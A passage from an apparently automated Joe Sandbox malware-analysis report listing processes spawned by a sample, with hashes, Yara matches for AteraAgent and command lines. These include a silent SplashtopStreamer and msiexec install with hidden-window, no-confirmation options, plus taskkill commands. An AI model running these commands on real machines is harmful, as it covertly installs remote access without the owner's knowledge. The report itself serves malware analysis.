                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2644540988.000002171967C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2672625808.0000021732811000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2644865064.000002171968E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2648442320.0000021719940000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2648816776.000002171A0C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2644865064.00000217196FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2644865064.00000217196BA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2644865064.00000217196B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000000.2010019478.0000021719512000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2648816776.0000021719F41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2644540988.0000021719670000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2648816776.0000021719FB8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000021.00000002.2648816776.000002171A14A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:34
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:30
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:35
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:39
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k smphost
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                                                                                                                  File size:55'320 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:48
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\SplashtopStreamer.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                  File size:56'378'536 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:F1356F7FBD37502B529D9BCD643FB7AB
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000024.00000002.2614681807.00000000005B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000024.00000002.2618143412.0000000000620000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:51
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\unpack\PreVerCheck.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:"C:\Windows\Temp\unpack\PreVerCheck.exe" /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0xbb0000
                                                                                                                                                                                                                                                                                                                                  File size:2'792'968 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:DF5EB1AF99091A902EFFA52463EDA084
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:51
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:msiexec /norestart /i "setup.msi" /qn /l*v "C:\Windows\TEMP\PreVer.log.txt" CA_EXTPATH=1 USERINFO="sec_opt=0,confirm_d=0,hidewindow=1"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x4e0000
                                                                                                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:52
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 556B5128AD7072E16BEB10DB90B1A40C E Global\MSI0000
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x4e0000
                                                                                                                                                                                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:54
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{E00D6CF4-4FC3-431C-B643-8FF5D1691F3C}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:41
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:54
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{92D3031C-81C4-4FED-8F50-F5E3BE9F3612}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:42
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4C499929-14EA-4E52-BDA5-131742626400}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:43
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{6385CD88-DCB3-4881-A482-8EE7F96DDDE3}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:44
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{8ABF8E23-F9FD-49C3-8B2D-36EBD8434563}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:45
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{4103781B-B841-4FC0-AA1E-5FD5FA8D8AE8}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:46
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{FB3E51D0-455D-47D0-B21A-C3DC48DCD266}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:47
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{AA5AA93B-7BA4-4056-819A-23A48FF3891F}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:48
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{035C7190-A369-4041-A248-C0E4DB43C54F}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:49
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:55
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\Temp\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\TEMP\{2E57EE32-498E-460F-A7F9-DBF7259DFF60}\_isA1FD.exe {EFB7539B-24F3-46B6-AF6E-3B021B51EFEF}:{B627E9BE-EB25-4498-B44A-CDE0D79185EC}
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff6279d0000
                                                                                                                                                                                                                                                                                                                                  File size:183'856 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:7A1C100DF8065815DC34C05ABC0C13DE
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:50
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRServer.exe /T"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:51
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:52
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:taskkill.exe /F /IM SRServer.exe /T
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x670000
                                                                                                                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:53
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe /C "taskkill.exe /F /IM SRApp.exe /T"
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:54
                                                                                                                                                                                                                                                                                                                                  Start time:18:30:56
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                                                                                                                  Target ID:381
                                                                                                                                                                                                                                                                                                                                  Start time:18:31:45
                                                                                                                                                                                                                                                                                                                                  Start date:30/10/2024
                                                                                                                                                                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                                                                                                    Function 06DF1630 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000003.1680772313.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: false
                                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_3_6df0000_rundll32.jbxd
                                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                                                                    • String ID: $kq$$kq
                                                                                                                                                                                                                                                                                                                                    • API String ID: 0-3550614674
                                                                                                                                                                                                                                                                                                                                    • Opcode ID: c9206b676734bcfd894e622e1452d593488f76a4f7def5f2cf94c8b6420b2b4d
                                                                                                                                                                                                                                                                                                                                    • Instruction ID: 45f454c15066cbd32ea981b742899415f691a23cbb8ec82f9d80a1bb5b632af6
                                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9206b676734bcfd894e622e1452d593488f76a4f7def5f2cf94c8b6420b2b4d
                                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A251BE31B10209DFCB55DF79DC506AEBBFAFF89250B25812AE918D7364DA309D01CBA0
                                                                                                                                                                                                                                                                                                                                    Function 06DF1080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                                                                                                                    Download Yara Rule
